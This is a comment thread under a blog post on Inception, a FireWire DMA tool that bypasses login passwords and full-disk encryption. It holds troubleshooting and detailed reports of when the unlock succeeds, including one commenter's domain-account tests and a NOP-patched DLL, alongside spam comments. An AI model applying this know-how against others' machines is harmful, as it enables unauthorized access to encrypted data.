  61. Georgy

    Hi
    I’ve ordered the relevant FireWire pci-e card. While I’m waiting for it to arrive, could you tell me:
    Will this work running inception in a Debian 7 VM?
    Or does it need to run from the host?
    Thanks
    Georgy

    Reply
  62. Mr Schmeg

    Is FireWire broken in Ubuntu now_ Having the same error on many machines Ubuntu 12.04 LTS, Mint etc …
    ubuntu@ubuntu:~/inception$ sudo ./incept

    _| _| _| _|_|_| _|_|_|_| _|_|_| _|_|_| _| _|_| _| _|
    _| _|_| _| _| _| _| _| _| _| _| _| _|_| _|
    _| _| _| _| _| _|_|_| _|_|_| _| _| _| _| _| _| _|
    _| _| _|_| _| _| _| _| _| _| _| _| _|_|
    _| _| _| _|_|_| _|_|_|_| _| _| _| _|_| _| _|

    v.0.2.5 (C) Carsten Maartmann-Moe 2013
    Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter

    [?] FireWire modules are not loaded (or insufficient privileges). Try loading
    them? [Y/n]:
    [!] Could not initialize FireWire. Are the modules loaded into the kernel?
    [!] Attack unsuccessful

    Reply
  63. crackruckles

    just got your tool installed on my raspberry pi and that went fine, i have it attached to a usb to firewire cable but i get the error “firewire modules not loaded” any ideas?

    Reply
  64. Binäre Optionen strategien

    I am really impressed with your writing skills and also with the layout on your blog.
    Is this a paid theme or did you modify it yourself?
    Either way keep up the excellent quality writing, it’s rare to see a great blog like
    this one today.

    Reply
  65. Watzmann

    Awesome tool. It worked for me onto a Apple 10.8.4, attacking a Windows XP machine over 1394, with McAfee FW and encryption. Now I am able to recover my personal, private, data. Will donate. Thank you very much.

    Reply
  66. Sam

    Hi, looks really interesting

    Can this be used to set up a serial console on linux systems to capture kernel panic stack traces?

    I want to do this on a machine that’s panicing every couple of days- it has no RS232 at all.

    Reply
  67. Pooper

    Im a nice guy. This shit is making me suicidal. I dont get you people. im literally going to just give up on people and end this shit.. and i was on your side too

    Reply
  68. Rena

    You’re on Hacker News. Better late than never?

    What a nice protocol Firewire is to just give you direct access to physical memory. So kind of it.

    Reply
  69. Kurt H Hanssen

    Hi Carsten
    Talk with you today about issues with Macbook Air and Macbook Pro from 2012 and newer.

    Have tested the Inception against a whole bunch of Macbook Air/Pro, old one and new. When i came to machines newer than mid 2012, it is not possible to read anything from the memory at the target machine. Have tried both the patching method and the –pickpocket.

    As an attacker machine, i have tried both Ubuntu 12.10 installed on PC and Mac (not using virtualization).

    The newer Macbook Air/Pro only have Thunderbolt, but I’m using the original Apple Thunderbolt –> Firewire adapter.

    Have success on attacking an 2011 Macbook Air trough Thunderbolt w/adapter but not two different MB Air from 2012 and 2013 and a MB pro from mid 2012.

    On all target machines, the juju firewire stack shows up, even on the newer MB pro/Air, so, i know the machine is recognized. They are also recognized by Inception as Apple computers

    I think there must be some sort of shield on the newer MB pro/air.

    Have even tried to shadow the attacker machine behind a Thuderbolt disk, but with same result,
    forensic1394_read_device_v: I/O Timeout

    Have also tried the forensic1394 libraries manually trough Python3, and these machines are all identified, possible to attach but no reading. I thin i had one success on reading just a few kilobytes with some tweaking on start/length.

    Reply
    • Carsten

      Hi Kurt. This is interesting. Would it be possible for me to get in touch with you to test this on your HW?

      Also – for anybody else reading this – are you experiencing the same issues?

      Reply
      • Kurt H Hanssen

        Hi Carsten
        Yes, I’m in Oslo from mon 3. to thu 6. March
        I have the machines available for you and we could have a look at these issues. Just let me know. I send you a SMS

        Kurt

        Reply
  70. Chris Taylor

    I think this tool is excellent and have been testing it as a method of conducting live computer forensics on a suspect’s machine. I think one way this could be improved would be to add a hashing feature in order to verify the integrity of the RAM image, therefore helping to make the image admissible as evidence.

    Chris

    Reply
  71. jk

    I understand that a native or pci firewire port is needed at the target system, but is it necessarily needed at the host?
    and would a firewire-usb adapter work if it was connected to a usb express card?
    (And i had to write trash into the website label since it didnt want me to post a comment else.)

    Reply
  72. Heinz Kreft

    Hi Carsten,
    Your Inception tool is a great proof of concept how difficult it would be to establish a good protection for unsafe platforms and is also an excellent demonstration of your personal capabilities …

    My reason here is to put an idea on the table I’ve had a long time im my head and so far I do not found such a thing on the Internet. I would like to ask you and the people here what do they thing about it.

    I called this currently not existing tool “ICT RipCord”. It should help to make PC’s a little bit safer against DMA & Cold Boot Attacks in the following way:

    A small system service on the PC (e.g. Windows, OSX) and an APP on a Smartphone (IOS, Android) work together as a “dead man switch”. They establish a VPC using (at install time) selfgenerated root certificates (no dependence from any third party) using Perfect Forward Secrecy (OTP session keys established by the Diffie-Hellmann-Protocol (DHP)). This channel is then used for a simple “ping-pong protocol” to make sure that everything is ok. If the so protected PC is not able to get a valid answer within a preset timeframe, the PC fails safe: Service stopps the system, (optional) zeros the RAM and force the PC to go down (forgetting the effected memory keys).

    This can limit the timeframe for an attacker having physical control over the PC-Victim to capture the key in memory.

    If the owner of the authentication token (the Smartphone with the auth-APP) detects his PC stolen, under attach or even forgotten to be switched off, he simply turns off the authentication service. There is no big issue, if this tool downs the PC in the case the network goes down because the legal owner of the PC is in general able to enter the key of the previously installed full disk encryption system.

    I am interessed to hear pros and cons about this.
    Thanks a lot,

    Heinz

    Reply
  73. Andy

    Hey, this tool really is cool :-)
    I will use this tool to silence some of the loud-mouthed guys here claiming that encrypting a PC without activating PBA is enough security …

    Something I noticed: Using Ubuntu 12.4 LTS with all required stuff added to attack a McAfee EEPC-encrypted Win7-64 Enterprise system.

    Attack works fine for the first attempt (PBA is passed, Win7 boots up, user logs in the regular way, screen is locked), unlock the screen is possible w/o password.
    When in this same session the screen then is locked again using WIN-L, the next attack fails (at around 29xx MiB – system has 4GB) with some firewire I/O error.

    Any specific reason for that ?

    After the system has been rebooted and a user logs in the regular way, and then locks the screen, the attack works again. Not really an issue, as one would expect an attacker to NOT lock the screen :-)
    Ony, assuming that the screen saver hits during e.g. copying the data off the attacked PC, it can’t be unlocked again, which can be annoying. (no, one can’t disable the screen saver, if the settings are done via GPO).

    Thanks,
    Andy

    Reply
  74. Andy

    Hi Carsten,

    (somehow the sort order of this posts is screwed up ?! It’s not ordered by date …)

    to protect a PC, one needs to know what a potential attacker needs to know of have, so: As I understood this tool, to log on to the victim PC (assuming a Windows system to be attacked), always an existing and valid local user account is required ?!

    I tried the following (all on Win7-64 as victim, joined into an AD domain):
    - System booted and domain account logged in, screen locked, network connected: Works, can unlock w/o password.
    - Same system, screen locked again: Won’t work, Firewire I/O error !
    - System booted, but nobody logged on, using the last logged-on domain account, network connected: Nope, no way !
    Tool says OK, but can’t log on. Seems the code to verify a domain account is not patched.
    - System booted, nobody logged on, using the last logged-on domain account, NO network connected: Works, can log on w/o password.
    - Same system, user logged off, same user logged on again: Still works, can log on again, no need to re-run the tool.
    - System booted, nobody logged on, using arbitrary local account: No way, unknow user!

    That means: A potential attacker always needs to know a valid local computer account (or a valid domain account that has cached credentials) on the victim. If the local administrator is renamed (or disabled and/or no local user is know or does exist – any idea here ?), it is impossible to log on. If the last logged-on user it not displayed and no user is known – impossible to log on (after using Inception).

    To achieve this, windows can be set to not display the last logged-on, and the local accounts can be renamed or deleted/disabled.

    I therefore would say: If an attacker has no clue which account is valid to log on, there’s no way to get in ?!
    Anybody disagrees ? Did I miss anything ?

    Is there a way to locate a valid user account / cached credentials in the memory dump without knowing it before ?

    (Carsten, let me know if you want some more things tested …)

    Regards,
    Andy

    Reply
  75. Bing

    Hey there! I’ve been following your site for a while now and finally got the courage to go ahead and give you a
    shout out from Austin Texas! Just wanted to say keep up the great job!

    Reply
  76. Toney

    Everyone loves what you guys are up too. Such clever work and coverage!
    Keep up the fantastic works guys I’ve included you guys to my blogroll.

    Reply
  77. Humberto

    Thanks for every other informative site. The place else may just I am
    getting that kind of info written in such a perfect manner?
    I have a venture that I am just now running on, and I’ve been at the glance out for
    such information.

    Reply
  78. kontynuować

    After going over a handful of the blog posts on your site, I seriously like your technique
    of writing a blog. I bookmarked it to my bookmark webpage list and will be
    checking back soon. Take a look at my web site too and tell me your opinion.

    Reply
  79. how to drive an atv

    In addition to bringing your stun master along, you also need to assure the security
    needs of your family. For persons 16 years and older
    the ATV size is over 90 cc. The truck comes in two-wheel
    drive or four-wheel drive, and can pull a load of about 13,000
    to 16,000 pounds, which is usually sufficient for hauling an
    ATV or fun runner.

    Reply
  80. Amazing software that give you unlimited youtube views from REAL people 24 hours a day.

    This software are certain to get you thousands of views.

    It is usually a peer to fellow traffic exchange for virtually every website.
    The views you will get are completely real and from real people and they must view for any specific time
    duration of the choosing. I get this to be an outstanding tool for
    getting fast large amounts of youtube vistas. I can average
    one thousand views per time.

    Reply
  81. Andrea

    Hello,

    I tested inception on windows 7 32 and 64 bit with SP0 and SP1 and it doesn’t working. :(

    Please, can you test this system?

    Thank you.

    Reply
  82. Giovani

    Hi Carsten,

    first of all, thanks for your excellent tool! However I’ve got some trouble with my recently installed PCIe controller. The DMA attack works without any problems. But the memory analysis shows that the dumpfile is broken.

    Attacker: Ubu 12.04.3 native 1394
    Victim: Win7SP1x64 4GB RAM 1394 on PCIe_x1
    Tool: Volatility 2.3.1

    Reply
    • Carsten

      DMA access over FireWire is not atomic unfortunately, so currently there’s no fix for this as volatility expects an atomic memory copy.

      Reply
  83. ysminnpu

    is it possible to detect the windows version before attack? this can save attacking time because we only need to search specific signatures for that windows version.

    Reply
  84. Andrea

    Hello,

    I tested the attack of unlock password of inception on windows 7 32 and 64 bit with SP0 and SP1 and it doesn’t working. :(

    Please, can you test this system?

    Thank you.

    Reply
  85. Anders Karlsson

    Inception v.0.3.5 no longer finds any signature after patching my Windows 7. Winver version is: 7601 SP1, version of msv1_0.dll is: 6.1.7601.22616
    It has worked before until recent patches. How do I find the new signature?

    Reply
  86. lockedbits

    after some updates bitlocker doesnt let me boot into Win8.1 anymore because “winload.efi” was modified and I am forced to enter the recovery key now… recovery key is saved in keepass on the encrypted drive… is there any way to bypass that recovery key menu with inception? the notebook has no firewire so I have to put the HDD in another computer and buy a PCIe FW Card – dont know if this could work because of the tpm chip?

    Reply
  87. Sir.Costy

    Can the Inception tool unlock and escalate privileges if you are already login (logon)? Mean after entering the in the user account? Or it is working only when the logon window it is shown at the beginning?

    Reply
  88. bittorrent spartan wars hack for android

    Write more, thats all I have to say. Literally, it
    seems as though you relied on the video to make your point.
    You clearly know what youre talking about, why waste your intelligence on just posting videos
    to your weblog when you could be giving us something informative to read?

    Reply
  89. originalgaming.org

    Fantastic beat ! I would like to apprentice while you amend your web site, how can i subscribe for a blog web site?
    The account helped me a acceptable deal. I had been tiny bit acquainted of this
    your broadcast offered bright clear idea

    Reply
  90. Justina

    If you do your research, you wil find that 91 % oof all the jobs at hopme
    on the internet are scams. Article Source: you buy any online prodhct tto make extra money, go to Review – MOZ.
    Becoming an afffiliate for a product vendor wjll enable yyou sell their products for a percentage off the sale.

    Reply
  91. bravoxy

    Hi guys!
    I have a windows 8.1, 64 bit OS with full disk encryption. It is not possible to log-on to the computer. The only local admin password is forgotten. The tool successfully dumped the whole memory but not able to find the signature for win 8.1… Anybody have already make a signature for Win 8.1 64 bit? Thx. Any tool that can search bitlocker recovery key in the memory dump? (for win 8.1 ,64 bit) Thx

    Reply
  92. attis

    Hello,
    Based on Bravoxy’s problem, I’ve made a direct dll patch (W8.1 x64) with NOPs – let you in with any passwords. Still need tests on through the firewire to find the proper adressing.

    Reply
  93. John McCash

    Hi,
    This tool is really awesome. One thing I wish for, though, is the ability to run it from an inconspicuous mobile device of some kind. A 3rd generation iPod would be ideal, and I actually have one, but it appears that the most recent iPodLinux uses an older kernel than is supported by Inception. Do you know of any way to get Inception working on this platform (I did see what appeared to be some references on google to later kernels on this device, but no specific instructions) or else any other small mobile device that has a Firewire or other supported Inception interface?
    Thanks much
    John

    Reply
  94. John McCash

    One other possibility that occurs to me is that somebody could do a custom firmware for a wireless PC card of some kind that would allow inception to be run from any 802.1 enabled host against the system into which it is inserted. Know whether anyone might be working on anything like that? The same trick would, of course, work with other types of PC card.
    Thanks
    John

    Reply
  95. Carsten

    I don’t know if anybody is working on something like this. Running inception on an ipod would require you to get a newer kernel to run on it first, unfortunately.

    Reply

Trackbacks/Pingbacks

  1.  Fire through the wire | Break & Enter
  2.  Download winlockpwn | Break & Enter
  3.  Virtualized Firewire attack « DiabloHorn
  4.  Adventures with Daisy in Thunderbolt-DMA-land: Hacking Macs through the Thunderbolt interface | Break & Enter
  5.  Alternative to winlockpwn: libforensic1394 | Break & Enter
  6.  winlockpwn on Ubuntu | Break & Enter
  7.  Video – Hacking OS X FileVault2 over Thunderbolt with Inception | Break & Enter
  8.  Cool Tool Tuesday Ed. I | TechByTom
  9.  Week 17 in Review – 2012 | Infosec Events
  10.  Lost+Found: iPhone bans and unlocks, Firewire exploits and Linux triage »
  11.  lost+found: iPhone zeigt sich verschlossen, Firewire hingegen offen, Avast hält Macs den Rücken frei | Edv-Sicherheitskonzepte.de – News Blog aus vielen Bereichen
  12.  Speaking session at OWASP NYC Chapter | Break & Enter
  13.  Inception | About Security
  14.  Links to tools demonstrated at OWASP NY/NJ chapter meeting | Break & Enter
  15.  Links to tools demonstrated at OWASP NY/NJ chapter meeting | About Security
  16.  Breaking Full-Disk Encryption Using FireWire « Decorator Pattern
  17.  Week 41 in Review – 2012 | Infosec Events
  18.  Elcomsoft Forensic Disk Decryptor « CC's Security Journal
  19.  inception.py — unlock any machine via firewire and then defeat BitLocker, TrueCrypt, FileVault, etc « Mick's Mix
  20.  inception — unlock any machine via firewire and then defeat BitLocker, TrueCrypt, FileVault, etc « Mick's Mix
  21.  Breaking Full-Disk Encryption with FireWire | Slingshot Orbit of Technology
  22.  Inception: a tool for compromising the slumber of computers with full-disk encryption – Boing Boing | Rob's Personal Aggregator
  23.  رادیو گیک. شماره بیست و یک، صدای یک دست
  24.  Uden fysisk sikkerhed er der ingen sikkerhed | Hennings blog
  25.  illmob » Inception
  26.  Truecrypt-, PGP- und Bitlocker-Festplatten entschlüsselnkr0ne.de | kr0ne.de
  27.  lost+found: Passwort-Schlampen, Katzen-Payload und ein lulz-PoC | Edv-Sicherheitskonzepte.de – News Blog aus vielen Bereichen
  28.  IT Secure Site » Blog Archive » Lost+Found: Password klutzes, cat payloads and a lulzy-PoC
  29.  Inception能入侵全盘加密的计算机 – 黑客新闻
  30.  between drafts | The Inception Tool: “Planting the Idea Into the Memory of the Machine That Every Password is Correct”
  31.  inception: new hacker tool « meditationatae
  32.  Four short links: 5 February 2013 - O'Reilly Radar
  33.  Elcomsoft Forensic Disk Decryptor v1.0.110 - Rapidshare Download Forum
  34.  Elcomsoft Forensic Disk Decryptor v1.0.110 - Download from Rapidshare, Extabit, rapidgator, mediafire, torrent
  35.  Elcomsoft Forensic Disk Decryptor v1.0.110 | ShareMovie.biz
  36.  Elcomsoft Forensic Disk Decryptor v1.0.110 Download from Rapidshare, Rapidgator, Hotfile, Bitshare, Megaupload, Eextabit
  37.  Elcomsoft Forensic Disk Decryptor v1.0.110 8.3 MB
  38.  Elcomsoft Forensic Disk Decryptor v1.0.110 – Adli Disk Şifresi Çözme Programı | Film indir Tek Link Film indir Bedava Full HD Film indir Download
  39.  Direct Memory Access is evil! | IT-Unsecurity
  40.  Elcomsoft Forensic Disk Decryptor v1.0.110 8.3 MB - Download from Rapidshare, Extabit, rapidgator, mediafire, torrent
  41.  Bookmarks for March 8th through April 30th
  42.  Safeguarding your laptop with encryption, passwords, and behaviour | afreak.ca
  43.  Hacker tools you should know and worry about | Stephen Hirst
  44.  Inception – PCI memory exploit | TabChalk - Securin' Insecure!
  45.  My day at TechEd Pre-conference | Jaap Brasser's Blog
  46.  编程随想 | TrueCrypt 使用经验[3]:关于加密盘的破解和防范措施 - 中国数字时代
  47.  How Secure are TrueCrypt and BitLocker? | MCB Systems
  48.  Elcomsoft Forensic Disk Decryptor v1.0.110 – Adli Disk Şifresi Çözme Programı Film indir , Albüm indir , Dizi indir , Rapidshare , FileSwap | Film indir - Oyun indir - Albüm indir - Program indir
  49.  Why Microsoft should not turn off DMA on firewire in lock screen mode | TechPour.com
  50.  今周刊 » 003: 渗透测试中的冷却启动攻击和其他取证技术
  51.  渗透测试中的冷却启动攻击和其他取证技术 | zengine
  52.  渗透测试中的冷却启动攻击和其他取证技术 – BugSec
  53.  渗透测试中的冷却启动攻击和其他取证技术 | Sky‘s自留地
  54.  渗透测试中的冷却启动攻击和其他取证技术 | J0s1ph's Blog
  55.  Näin helposti murtuu kryptattu Windows-kone | Tietokone Knowledge
  56.  Visto nel Web – 116 | Ok, panico
  57.  渗透测试中的冷却启动攻击和其他取证技术 | Crackkay.net
  58.  Using FireWire and Metasploit to extract BitLocker Encryption Keys | InformationInSecurity
  59.  Compilado de enlaces | programacion@droope
  60.  BWAAAAM BWAAAAAAM BWAAAAAM – Barely Legally :: This can't be constitutional.
  61.  Inception Metasploit integration | Break & Enter

Leave a Reply

  • (will not be published)